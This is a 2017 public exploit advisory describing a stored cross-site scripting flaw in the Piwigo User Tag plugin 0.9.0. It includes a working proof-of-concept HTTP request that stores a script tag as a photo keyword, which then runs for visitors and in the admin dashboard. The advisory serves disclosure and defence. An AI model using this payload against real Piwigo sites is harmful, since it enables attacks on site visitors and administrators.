Piwigo User Tag 0.9.0 Cross Site Scripting
Posted on 15 August 2017
# Exploit Title: Piwigo plugin User Tag , Persistent XSS # Date: 10 Aug, 2017 # Extension Version: 0.9.0 # Software Link: http://piwigo.org/basics/downloads # Extension link : http://piwigo.org/ext/extension_view.php?eid=441 # Exploit Author: Touhid M.Shaikh # Contact: http://twitter.com/touhidshaikh22 # Website: http://touhidshaikh.com/ # Category: webapps ######## Description ######## <!-- What is Piwigo ? Piwigo is photo gallery software for the web, built by an active community of users and developers.Extensions make Piwigo easily customizable.Piwigo is a free and open source. User Tag Extension in piwigo. This plugin extends piwigo with the function to Allow visitors to add tags to photos. ############ Requrment ############## Admin Must allow to user or guest for a tag in User Tag plugin option. ######## Attact Description ######## <!-- User Tag Extension provides additional function on photo page for the user to tag any name of that image. NOTE: "test.touhidshaikh.com" this domain not registered on the internet. This domain host on local machine. ==>START<== Any guest visitor or registered user can perform this. User Tag Extension adds an additional field(Keyword) on photo pages that let you tag a User Tag on the picture for visitor and registered user. click on that Field after that fill input text box with malicious code javascript and press Enter its stored as a User Tag keyword. Your Javascript Stored in Server's Database and execute every time when any visitor visit that photo. NOte: This is also executed in admin's dashboard when admin visit keyword page. --> ######## Proof of Concept ######## *****Request***** POST /ws.php?format=json&method=user_tags.tags.update HTTP/1.1 Host: test.touhidshaikh.com User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:54.0) Gecko/20100101 Firefox/54.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-GB,hi;q=0.8,ar;q=0.5,en;q=0.3 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Referer: http://test.touhidshaikh.com/picture.php?/4/category/1 Content-Length: 83 Cookie: _ga=GA1.2.392572598.1501252105; pwg_id=gsf3gp640oupaer3cjpnl22sr0 Connection: close image_id=4&referer=picture.php%3F%2F4%2Fcategory%2F1&tags=<script>prompt()</script> ************************************************** ******Response******** HTTP/1.1 200 OK Date: Thu, 10 Aug 2017 11:36:24 GMT Server: Apache/2.4.27 (Debian) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Content-Length: 46 Connection: close Content-Type: text/plain; charset=utf-8 {"stat":"ok","result":{"info":"Tags updated"}} **************************************************** #################################################### Greetz: Thank You, All my Friends who support me. ;)